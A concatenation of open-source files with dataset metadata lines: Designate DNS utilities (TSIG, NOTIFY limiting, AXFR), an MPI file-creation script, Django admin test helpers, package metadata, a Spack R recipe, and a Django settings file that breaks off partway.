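def _example_io_pass(connection, sock):
    while True:
        if write_socket_output(connection, sock) == Connection.EOS:
            break
        if read_socket_input(connection, sock) == Connection.EOS:
            break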
|
apache-2.0
| -6,626,798,108,324,280,000 | 32.421488 | 78 | 0.612018 | false |
grahamhayes/designate
|
designate/dnsutils.py
|
1
|
11985
|
# Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Author: Endre Karlson <endre.karlson@hpe.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
import socket
import base64
import time
from threading import Lock
import six
import dns
import dns.exception
import dns.zone
import eventlet
from dns import rdatatype
from oslo_log import log as logging
from oslo_config import cfg
from designate import context
from designate import exceptions
from designate import objects
from designate.i18n import _LE
from designate.i18n import _LI
LOG = logging.getLogger(__name__)
util_opts = [
cfg.IntOpt('xfr_timeout', help="Timeout in seconds for XFR's.", default=10)
]
class DNSMiddleware(object):
"""Base DNS Middleware class with some utility methods"""
def __init__(self, application):
self.application = application
def process_request(self, request):
"""Called on each request.
If this returns None, the next application down the stack will be
executed. If it returns a response then that response will be returned
and execution will stop here.
"""
return None
def process_response(self, response):
"""Do whatever you'd like to the response."""
return response
def __call__(self, request):
response = self.process_request(request)
if response:
return response
response = self.application(request)
return self.process_response(response)
def _build_error_response(self):
response = dns.message.make_response(
dns.message.make_query('unknown', dns.rdatatype.A))
response.set_rcode(dns.rcode.FORMERR)
return response
class SerializationMiddleware(DNSMiddleware):
"""DNS Middleware to serialize/deserialize DNS Packets"""
def __init__(self, application, tsig_keyring=None):
self.application = application
self.tsig_keyring = tsig_keyring
def __call__(self, request):
# Generate the initial context. This may be updated by other middleware
# as we learn more information about the Request.
ctxt = context.DesignateContext.get_admin_context(all_tenants=True)
try:
message = dns.message.from_wire(request['payload'],
self.tsig_keyring)
if message.had_tsig:
LOG.debug('Request signed with TSIG key: %s', message.keyname)
# Create + Attach the initial "environ" dict. This is similar to
# the environ dict used in typical WSGI middleware.
message.environ = {
'context': ctxt,
'addr': request['addr'],
}
except dns.message.UnknownTSIGKey:
LOG.error(_LE("Unknown TSIG key from %(host)s:"
"%(port)d") % {'host': request['addr'][0],
'port': request['addr'][1]})
            yield self._build_error_response().to_wire(max_size=65535)
except dns.tsig.BadSignature:
LOG.error(_LE("Invalid TSIG signature from %(host)s:"
"%(port)d") % {'host': request['addr'][0],
'port': request['addr'][1]})
            yield self._build_error_response().to_wire(max_size=65535)
except dns.exception.DNSException:
LOG.error(_LE("Failed to deserialize packet from %(host)s:"
"%(port)d") % {'host': request['addr'][0],
'port': request['addr'][1]})
            yield self._build_error_response().to_wire(max_size=65535)
except Exception:
LOG.exception(_LE("Unknown exception deserializing packet "
"from %(host)s %(port)d") %
{'host': request['addr'][0],
'port': request['addr'][1]})
            yield self._build_error_response().to_wire(max_size=65535)
else:
# Hand the Deserialized packet onto the Application
for response in self.application(message):
# Serialize and return the response if present
if isinstance(response, dns.message.Message):
yield response.to_wire(max_size=65535)
elif isinstance(response, dns.renderer.Renderer):
yield response.get_wire()
class TsigInfoMiddleware(DNSMiddleware):
"""Middleware which looks up the information available for a TsigKey"""
def __init__(self, application, storage):
super(TsigInfoMiddleware, self).__init__(application)
self.storage = storage
def process_request(self, request):
if not request.had_tsig:
return None
try:
criterion = {'name': request.keyname.to_text(True)}
tsigkey = self.storage.find_tsigkey(
context.get_current(), criterion)
request.environ['tsigkey'] = tsigkey
request.environ['context'].tsigkey_id = tsigkey.id
except exceptions.TsigKeyNotFound:
# This should never happen, as we just validated the key.. Except
# for race conditions..
return self._build_error_response()
return None
class TsigKeyring(object):
"""Implements the DNSPython KeyRing API, backed by the Designate DB"""
def __init__(self, storage):
self.storage = storage
def __getitem__(self, key):
return self.get(key)
def get(self, key, default=None):
try:
criterion = {'name': key.to_text(True)}
tsigkey = self.storage.find_tsigkey(
context.get_current(), criterion)
return base64.decodestring(tsigkey.secret)
except exceptions.TsigKeyNotFound:
return default
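# Illustrative sketch (not part of the original module): the keyring is
# handed straight to dnspython, which calls .get() with the key name found
# in the TSIG record. 'storage' and 'wire' are assumed to exist.
#     keyring = TsigKeyring(storage)
#     message = dns.message.from_wire(wire, keyring=keyring)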
class ZoneLock(object):
"""A Lock across all zones that enforces a rate limit on NOTIFYs"""
def __init__(self, delay):
self.lock = Lock()
self.data = {}
self.delay = delay
def acquire(self, zone):
with self.lock:
# If no one holds the lock for the zone, grant it
if zone not in self.data:
self.data[zone] = time.time()
return True
# Otherwise, get the time that it was locked
locktime = self.data[zone]
now = time.time()
period = now - locktime
# If it has been locked for longer than the allowed period
# give the lock to the new requester
if period > self.delay:
self.data[zone] = now
return True
            LOG.debug('Lock for %(zone)s can\'t be released for %(period)s '
                      'seconds' % {'zone': zone,
                                   'period': str(self.delay - period)})
# Don't grant the lock for the zone
return False
def release(self, zone):
# Release the lock
with self.lock:
try:
self.data.pop(zone)
except KeyError:
pass
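# Illustrative sketch (not part of the original module): the acquire/release
# pair as LimitNotifyMiddleware below uses it. acquire() returns False when
# a NOTIFY for the same zone arrived within the rate-limit window.
def _example_zone_lock(zone_name):
    locker = ZoneLock(delay=5.0)
    if locker.acquire(zone_name):
        try:
            pass  # forward the NOTIFY to the agent here
        finally:
            locker.release(zone_name)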
class LimitNotifyMiddleware(DNSMiddleware):
"""Middleware that rate limits NOTIFYs to the Agent"""
def __init__(self, application):
super(LimitNotifyMiddleware, self).__init__(application)
self.delay = cfg.CONF['service:agent'].notify_delay
self.locker = ZoneLock(self.delay)
def process_request(self, request):
opcode = request.opcode()
if opcode != dns.opcode.NOTIFY:
return None
zone_name = request.question[0].name.to_text()
if self.locker.acquire(zone_name):
time.sleep(self.delay)
self.locker.release(zone_name)
return None
else:
LOG.debug('Threw away NOTIFY for %(zone)s, already '
'working on an update.' % {'zone': zone_name})
response = dns.message.make_response(request)
# Provide an authoritative answer
response.flags |= dns.flags.AA
return (response,)
def from_dnspython_zone(dnspython_zone):
# dnspython never builds a zone with more than one SOA, even if we give
# it a zonefile that contains more than one
soa = dnspython_zone.get_rdataset(dnspython_zone.origin, 'SOA')
if soa is None:
raise exceptions.BadRequest('An SOA record is required')
email = soa[0].rname.to_text().rstrip('.')
email = email.replace('.', '@', 1)
values = {
'name': dnspython_zone.origin.to_text(),
'email': email,
'ttl': soa.ttl,
'serial': soa[0].serial,
'retry': soa[0].retry,
'expire': soa[0].expire
}
zone = objects.Zone(**values)
rrsets = dnspyrecords_to_recordsetlist(dnspython_zone.nodes)
zone.recordsets = rrsets
return zone
def dnspyrecords_to_recordsetlist(dnspython_records):
rrsets = objects.RecordList()
for rname in six.iterkeys(dnspython_records):
for rdataset in dnspython_records[rname]:
rrset = dnspythonrecord_to_recordset(rname, rdataset)
if rrset is None:
continue
rrsets.append(rrset)
return rrsets
def dnspythonrecord_to_recordset(rname, rdataset):
record_type = rdatatype.to_text(rdataset.rdtype)
# Create the other recordsets
values = {
'name': rname.to_text(),
'type': record_type
}
if rdataset.ttl != 0:
values['ttl'] = rdataset.ttl
rrset = objects.RecordSet(**values)
rrset.records = objects.RecordList()
for rdata in rdataset:
rr = objects.Record(data=rdata.to_text())
rrset.records.append(rr)
return rrset
def do_axfr(zone_name, servers, timeout=None, source=None):
"""
Performs an AXFR for a given zone name
"""
random.shuffle(servers)
timeout = timeout or cfg.CONF["service:mdns"].xfr_timeout
xfr = None
for srv in servers:
to = eventlet.Timeout(timeout)
log_info = {'name': zone_name, 'host': srv}
try:
LOG.info(_LI("Doing AXFR for %(name)s from %(host)s"), log_info)
xfr = dns.query.xfr(srv['host'], zone_name, relativize=False,
timeout=1, port=srv['port'], source=source)
raw_zone = dns.zone.from_xfr(xfr, relativize=False)
break
except eventlet.Timeout as t:
if t == to:
msg = _LE("AXFR timed out for %(name)s from %(host)s")
LOG.error(msg % log_info)
continue
except dns.exception.FormError:
msg = _LE("Zone %(name)s is not present on %(host)s."
"Trying next server.")
LOG.error(msg % log_info)
except socket.error:
msg = _LE("Connection error when doing AXFR for %(name)s from "
"%(host)s")
LOG.error(msg % log_info)
except Exception:
msg = _LE("Problem doing AXFR %(name)s from %(host)s. "
"Trying next server.")
LOG.exception(msg % log_info)
        finally:
            # 'continue' is not allowed inside a 'finally' clause here;
            # after cleanup the loop moves on to the next server anyway,
            # and a successful 'break' is preserved.
            to.cancel()
else:
msg = _LE("XFR failed for %(name)s. No servers in %(servers)s was "
"reached.")
raise exceptions.XFRFailure(
msg % {"name": zone_name, "servers": servers})
LOG.debug("AXFR Successful for %s" % raw_zone.origin.to_text())
return raw_zone
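# Illustrative call sketch (not part of the original module); the server
# addresses are made up. Each entry needs 'host' and 'port' keys:
#     servers = [{'host': '192.0.2.10', 'port': 53},
#                {'host': '192.0.2.11', 'port': 53}]
#     raw_zone = do_axfr('example.org.', servers, timeout=10)
#     zone = from_dnspython_zone(raw_zone)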
|
apache-2.0
| -2,717,896,543,009,347,000 | 31.131367 | 79 | 0.583229 | false |
stevec7/iointegrity
|
contrib/mpi/mpi_create_files.py
|
1
|
3537
|
#!/usr/bin/env python
import datetime
import logging
import os
import sys
from mpi4py import MPI
from optparse import OptionParser
from iointegrity.iotools import create_random_file, FileMD5
from iointegrity.dbtools import IOIntegrityDB
def main(options, args):
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
# setup logging
if options.verbose:
logging.basicConfig(format='%(message)s', level=logging.DEBUG)
else:
logging.basicConfig(format='%(message)s', level=logging.INFO)
if rank == 0:
# do the master
master(comm, options)
else:
# secondary stuff
slave(comm, options)
return
def create(options, work):
fmd5 = FileMD5()
results = []
for w in work:
create_random_file(w, options.size)
md5sum = fmd5.create_md5(w)
results.append((w, md5sum))
return results
def master(comm, options):
'''rank 0 will handle the program setup, and distribute
tasks to all of the other ranks'''
num_ranks = comm.Get_size()
filename = "{0}/{1}{2}.dat"
# create a list of files to pass to the ranks
files = [ filename.format(options.dir, options.prefix, n)
for n in range(0, options.numfiles) ]
# if num_ranks is 1, then we exit...
if num_ranks == 1:
print("Need more than 1 rank Ted...")
comm.Abort(1)
# split into chunks since mpi4py's scatter cannot take a size arg
chunks = [[] for _ in range(comm.Get_size())]
for e, chunk in enumerate(files):
chunks[e % comm.Get_size()].append(chunk)
rc = comm.scatter(chunks)
results = create(options, rc)
# get results and add to a database
results = comm.gather(results, root=0)
db = IOIntegrityDB(options.dbfile)
mydate = datetime.datetime.now().isoformat()
to_insert = []
for rank, r in enumerate(results):
logging.debug("Rank: {}, Results: {}".format(rank, r))
for i in r:
to_insert.append((i[0], i[1], '', '', mydate))
db.mass_insert_filemd5(to_insert)
return
def slave(comm, options):
rank = comm.Get_rank()
data = []
results = []
data = comm.scatter(data, root=0)
start_time = MPI.Wtime()
results = create(options, data)
elapsed = MPI.Wtime() - start_time
# these will be committed to a database
results = comm.gather(results, root=0)
return
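# Usage sketch (not part of the original script): the program must run under
# MPI with at least two ranks; the paths and sizes below are made up.
#     mpirun -np 4 python mpi_create_files.py -d /scratch/test \
#         -f /tmp/ioint.db -n 100 -p chk_ -s 1048576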
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('-d', '--dir',
dest='dir',
type='str',
help='full path to dir where files will be created.')
parser.add_option('-f', '--dbfile',
dest='dbfile',
type='str',
help='full path to the database file.')
parser.add_option('-n', '--numfiles',
dest='numfiles',
type='int',
help='number of files to create')
parser.add_option('-p', '--prefix',
dest='prefix',
type='str',
help='prefix to add to the beginning of the files')
parser.add_option('-s', '--size',
dest='size',
type='int',
help='file size in bytes')
parser.add_option('-v', '--verbose',
action='store_true',
dest='verbose',
help='show verbose output')
options, args = parser.parse_args()
main(options, args)
|
bsd-3-clause
| 8,793,834,149,230,574,000 | 27.756098 | 73 | 0.559796 | false |
ctxis/django-admin-view-permission
|
tests/tests/helpers.py
|
1
|
4472
|
from __future__ import unicode_literals
from django.conf.urls import url
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Permission
from django.test import Client, TestCase
from model_mommy import mommy
from model_mommy.recipe import seq
SIMPLE_USERNAME = seq('simple_user_')
SUPER_USERNAME = seq('super_user_')
def create_simple_user(username=None):
if not username:
username = SIMPLE_USERNAME
simple_user = mommy.make(get_user_model(), username=username)
simple_user.set_password('simple_user')
# Django 1.8 compatibility
simple_user.is_staff = True
simple_user.save()
return simple_user
def create_super_user(username=None):
if not username:
username = SUPER_USERNAME
super_user = mommy.make(
get_user_model(),
username=username, is_superuser=True)
super_user.set_password('super_user')
# Django 1.8 compatibility
super_user.is_staff = True
super_user.save()
return super_user
def create_urlconf(admin_site):
return type(
str('Urlconf'),
(object,),
{'urlpatterns': [
url('test_admin/', admin_site.urls)
]}
)
class DataMixin(object):
@classmethod
def setUpTestData(cls):
# Permissions
cls.add_permission_model1 = Permission.objects.get(
name='Can add test model1')
cls.view_permission_model1 = Permission.objects.get(
name='Can view testmodel1')
cls.change_permission_model1 = Permission.objects.get(
name='Can change test model1')
cls.delete_permission_model1 = Permission.objects.get(
name='Can delete test model1')
cls.view_permission_model1parler = Permission.objects.get(
name='Can view testmodelparler'
)
cls.view_permission_model1parlertranslation = Permission.objects.get(
name='Can view testmodelparlertranslation'
)
cls.add_permission_model4 = Permission.objects.get(
name='Can add test model4')
cls.view_permission_model4 = Permission.objects.get(
name='Can view testmodel4')
cls.change_permission_model4 = Permission.objects.get(
name='Can change test model4')
cls.delete_permission_model4 = Permission.objects.get(
name='Can delete test model4')
cls.add_permission_model5 = Permission.objects.get(
name='Can add test model5')
cls.view_permission_model5 = Permission.objects.get(
name='Can view testmodel5')
cls.change_permission_model5 = Permission.objects.get(
name='Can change test model5')
cls.delete_permission_model5 = Permission.objects.get(
name='Can delete test model5')
cls.add_permission_model6 = Permission.objects.get(
name='Can add test model6')
cls.view_permission_model6 = Permission.objects.get(
name='Can view testmodel6')
cls.change_permission_model6 = Permission.objects.get(
name='Can change test model6')
cls.delete_permission_model6 = Permission.objects.get(
name='Can delete test model6')
class AdminViewPermissionViewsTestCase(DataMixin, TestCase):
@classmethod
def setUpTestData(cls):
super(AdminViewPermissionViewsTestCase, cls).setUpTestData()
cls.user_with_v_perm_on_model1 = create_simple_user(
username='user_with_v_perm_on_model1',
)
cls.user_with_v_perm_on_model1.user_permissions.add(
cls.view_permission_model1,
)
cls.user_with_vd_perm_on_moedl1 = create_simple_user(
username='user_with_vd_perm_on_model1',
)
cls.user_with_vd_perm_on_moedl1.user_permissions.add(
cls.view_permission_model1,
cls.delete_permission_model1,
)
cls.user_with_v_perm_on_model1parler = create_simple_user(
username='user_with_v_perm_on_model1parler'
)
cls.user_with_v_perm_on_model1parler.user_permissions.add(
cls.view_permission_model1parler,
)
cls.user_with_v_perm_on_model1parler.user_permissions.add(
cls.view_permission_model1parlertranslation,
)
cls.super_user = create_super_user(username='super_user')
def setUp(self):
self.client = Client()
def tearDown(self):
self.client.logout()
|
bsd-2-clause
| -5,763,516,324,128,774,000 | 31.405797 | 77 | 0.641547 | false |
veselosky/siteqa
|
siteqa/__about__.py
|
1
|
1122
|
# vim: set fileencoding=utf-8 :
#
# Copyright 2017 Vince Veselosky and contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
"__author__",
"__author_email__",
"__copyright__",
"__description__",
"__license__",
"__name__",
"__url__",
"__version__",
]
__author__ = "Vince Veselosky"
__author_email__ = "vince@veselosky.com"
__copyright__ = "2017 Vince Veselosky and contributors"
__description__ = "Tools for checking website quality"
__license__ = "Apache 2.0"
__name__ = "siteqa"
__url__ = 'https://github.com/veselosky/siteqa'
__version__ = "0.1.0"
|
apache-2.0
| 1,655,158,620,334,144,500 | 30.166667 | 76 | 0.658645 | false |
ClearCorp/odootools
|
odootools/odootools/install/update.py
|
1
|
2076
|
#!/usr/bin/python2
# -*- coding: utf-8 -*-
########################################################################
#
# Odoo Tools by CLEARCORP S.A.
# Copyright (C) 2009-TODAY CLEARCORP S.A. (<http://clearcorp.co.cr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
########################################################################
'''
Description: Updates the odootools installation
WARNING: If you update this file, please remake the installer and
upload it to launchpad.
To make the installer, run this file or call odootools-make
if the odootools are installed.
'''
import os
import logging
from odootools.lib import config, bzr, tools
_logger = logging.getLogger('odootools.install.update')
def update():
_logger.debug('Checking if user is root')
tools.exit_if_not_root('odootools-update')
bzr.bzr_initialize()
if 'odootools_path' in config.params:
odootools_path = config.params['odootools_path']
else:
_logger.error('The Odoo Tools path was not specified. Exiting.')
return False
if not os.path.isdir(odootools_path):
        _logger.error('The Odoo Tools path (%s) is not a valid directory. Exiting.' % odootools_path)
return False
if 'source_repo' in config.params:
bzr.bzr_pull(odootools_path, config.params['source_repo'])
else:
bzr.bzr_pull(odootools_path)
return True
|
agpl-3.0
| -5,720,672,702,035,555,000 | 34.186441 | 101 | 0.63632 | false |
skosukhin/spack
|
var/spack/repos/builtin/packages/r-tiff/package.py
|
1
|
1775
|
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RTiff(RPackage):
"""This package provides an easy and simple way to read, write and
display bitmap images stored in the TIFF format. It can read and
write both files and in-memory raw vectors."""
homepage = "http://www.rforge.net/tiff/"
url = "https://cran.rstudio.com/src/contrib/tiff_0.1-5.tar.gz"
list_url = "https://cran.r-project.org/src/contrib/Archive/tiff"
version('0.1-5', '5052990b8647c77d3e27bc0ecf064e0b')
depends_on("libjpeg")
depends_on("libtiff")
|
lgpl-2.1
| 4,270,702,897,405,814,300 | 43.375 | 78 | 0.673239 | false |
blaiseli/p4-phylogenetics
|
p4/node.py
|
1
|
9111
|
import func
from var import var
import sys
import pf
class NodeBranchPart(object):
def __init__(self):
self.rMatrixNum = -1
self.gdasrvNum = -1
#self.bigP = None
class NodeBranch(object):
def __init__(self):
self.len = 0.1
# self.textDrawSymbol = '-' # See var.modelSymbols for some
# alternative symbols
self.rawSplitKey = None # Odd or even
self.splitKey = None # Only even
#self.name = None
# self.uName = None # under-name
# self.color = None # US spelling.
# self.support = None # A float, so that it can preserve all its significant
# digits, yet can be formatted flexibly for output.
# self.biRootCount = None # For cons trees, where the input trees are
# bi-Rooted, ie have bifurcating roots. This
# is the number of compatible input trees that
# were rooted on this branch.
self.parts = [] # NodeBranchPart() objects
self.lenChanged = False
class NodePart(object):
def __init__(self):
#self.pats = None
#self.nPats = 0
self.compNum = -1
#self.cl = None
#self.cl2 = None
class Node(object):
"""A Node is a vertex in a Tree. All but the root have a branch.
A Node has pointers to its parent, leftChild, and sibling, any of which may be None.
"""
# def __del__(self, freeNode=pf.p4_freeNode, dp_freeNode=pf.dp_freeNode,
# mysys=sys):
    def __del__(self, freeNode=pf.p4_freeNode, dp_freeNode=pf.dp_freeNode,
                mysys=sys):
# def __del__(self, freeNode=pf.p4_freeNode, dp_freeNode=pf.dp_freeNode):
# def __del__(self, freeNode=pf.p4_freeNode):
# if self.nodeNum == 0:
#mysys.stdout.write('Node.__del__() deleting node %i\n' % self.nodeNum)
# mysys.stdout.flush()
# Generally, cNodes are deleted before the cTree is freed. freeNode
# requires the cTree!
if self.cNode:
mysys.stdout.write('Node.__del__() node %i (%s) has a cNode (%s). How?!?\n' % (
self.nodeNum, self, self.cNode))
if self.doDataPart:
dp_freeNode(self.cNode)
else:
freeNode(self.cNode)
self.cNode = None
def __init__(self):
self.name = None
self.nodeNum = -1
self.parent = None
self.leftChild = None
self.sibling = None
self.isLeaf = 0
self.cNode = None # Pointer to a c-struct
# Zero-based seq numbering of course, so -1 means no sequence.
self.seqNum = -1
self.br = NodeBranch()
# self.rootCount = None # For cons trees, where the input trees do not
# have bifurcating roots. This is the number of
# compatible input trees that were rooted on this node.
self.parts = [] # NodePart objects
self.doDataPart = 0
self.flag = 0
def wipe(self):
"""Set the pointers parent, leftChild, and sibling to None"""
self.parent = None
self.leftChild = None
self.sibling = None
def rightmostChild(self):
"""Find and return the rightmostChild of self.
If self has no children, return None.
"""
n = self.leftChild
if not n:
return None
while n.sibling:
n = n.sibling
return n
def leftSibling(self):
"""Find and return the sibling on the left.
A node has a pointer to its sibling, but that is the sibling
on the right. It is a bit awkward to find the sibling on the
left, as you need to go via the parent and the leftChild of
the parent.
If there is no parent, return None. If there is no
leftSibling, return None.
"""
if not self.parent:
# print 'leftSibling(%i). No parent. returning None.' %
# self.nodeNum
return None
lsib = self.parent.leftChild
if lsib == self:
# print 'leftSibling(%i). self is self.parent.leftChild.
# returning None.' % self.nodeNum
return None
while lsib:
if lsib.sibling == self:
# print 'leftSibling(%i): returning node %i' % (self.nodeNum,
# lsib.nodeNum)
return lsib
lsib = lsib.sibling
# These next 3 were suggestions from Rick Ree. Thanks, Rick!
# Then I added a couple more. Note that all of these use
# recursion, and so could bump into the recursion limit, and might
# fail on large trees. However, I tried iterPreOrder() on a
# random tree of 10,000 taxa, and it was fine.
# You can temporarily set a different recursion limit with the sys module.
# oldlimit = sys.getrecursionlimit()
# sys.setrecursionlimit(newLimit)
# See also Tree.iterNodesNoRoot()
def iterChildren(self):
n = self.leftChild
while n:
yield n
n = n.sibling
def iterPostOrder(self):
for c in self.iterChildren():
for n in c.iterPostOrder():
yield n
yield self
def iterPreOrder(self):
yield self
for c in self.iterChildren():
for n in c.iterPreOrder():
yield n
def iterLeaves(self):
for n in self.iterPreOrder():
if n.isLeaf:
yield n
def iterInternals(self):
for n in self.iterPreOrder():
if not n.isLeaf:
yield n
def iterDown(self, showDown=False):
"""Iterates over all the nodes below self (including self)
Starts by returning self. And then iterates over all nodes below self.
It does so by a combination of Node.iterPreOrder() and
Node.iterDown() (ie recursively). Now sometimes we want to
know if the nodes that are returned come from iterDown()
(strictly) or not (ie from iterPreOrder()). If that bit of
info is needed, then you can turn on the arg ``showDown``.
(The following is probably bad Python practice!) When that is done, whenever
iterDown() is called the first node that is returned will have
the attribute ``down`` set to True. But after it is returned,
that ``down`` attribute is zapped (to try to keep the bloat
down ...). So you need to test ``if hasattr(yourNode,
'down'):`` before you actually use it.
"""
if showDown:
self.down = True
yield self
if showDown:
del(self.down)
if self.parent:
for c in self.parent.iterChildren():
if c == self:
for n in c.parent.iterDown(showDown):
yield n
else:
for n in c.iterPreOrder():
yield n
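    # Illustrative sketch (not part of the original module) of the hasattr
    # test described in the docstring above; 'someNode' is hypothetical.
    #     for n in someNode.iterDown(showDown=True):
    #         if hasattr(n, 'down'):
    #             print 'reached node %i by going down' % n.nodeNum
    #         else:
    #             print 'node %i' % n.nodeNum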
# ###############################
def getNChildren(self):
"""Returns the number of children that the node has."""
if not self.leftChild:
return 0
c = self.leftChild
counter = 0
while c:
c = c.sibling
counter += 1
return counter
def isAncestorOf(self, otherNode):
"""Asks whether self is an an ancestor of otherNode."""
n = otherNode
while 1:
n = n.parent
if not n:
return False
elif n == self:
return True
def _ladderize(self, biggerGroupsOnBottom):
"""This is only used by Tree.ladderize()."""
# print '====Node %i' % self.nodeNum
if not self.leftChild:
pass
else:
nLeaves = []
children = []
ch = self.leftChild
while ch:
nL = len([n2 for n2 in ch.iterLeaves()])
nLeaves.append(nL)
ch.nLeaves = nL
children.append(ch)
ch = ch.sibling
# print ' nLeaves = %s' % nLeaves
allOnes = True
for ch in children:
if ch.nLeaves > 1:
allOnes = False
break
if not allOnes:
children = func.sortListOfObjectsOnAttribute(
children, 'nLeaves')
if not biggerGroupsOnBottom:
children.reverse()
# print '\n Children\n ------------'
# for ch in children:
# print ' node=%i, nLeaves=%i' % (ch.nodeNum, ch.nLeaves)
self.leftChild = children[0]
theLeftChild = self.leftChild
theLeftChild.sibling = None
for ch in children[1:]:
theLeftChild.sibling = ch
theLeftChild = ch
theLeftChild.sibling = None
for ch in children:
del(ch.nLeaves)
for ch in self.iterChildren():
ch._ladderize(biggerGroupsOnBottom)
|
gpl-2.0
| -8,003,872,318,049,479,000 | 32.619926 | 93 | 0.537482 | false |
madre/analytics_nvd3
|
analytics/settings.py
|
1
|
5979
|
# Django settings for analytics project.
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
APPLICATION_DIR = os.path.dirname(globals()['__file__'])
PROJECT_ROOT = os.path.abspath(
os.path.join(os.path.dirname(__file__), ".."),
)
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'analytics.db', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': '',
'PASSWORD': '',
'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
TIME_ZONE = 'Asia/Shanghai'
LANGUAGE_CODE = 'zh-CN'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = os.path.join(PROJECT_ROOT, '')
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
os.path.join(PROJECT_ROOT, 'static'),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'sq)9^f#mf444c(#om$zpo0v!%y=%pqem*9s_fewfsxfwr_&x40u'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'analytics.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'analytics.wsgi.application'
TEMPLATE_DIRS = (os.path.join(APPLICATION_DIR, 'templates'), )
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_nvd3',
'demo',
'account',
'user_analytics',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
LOGIN_URL = "/accounts/login/"
# Django extensions
try:
import django_extensions
except ImportError:
pass
else:
INSTALLED_APPS = INSTALLED_APPS + ('django_extensions',)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
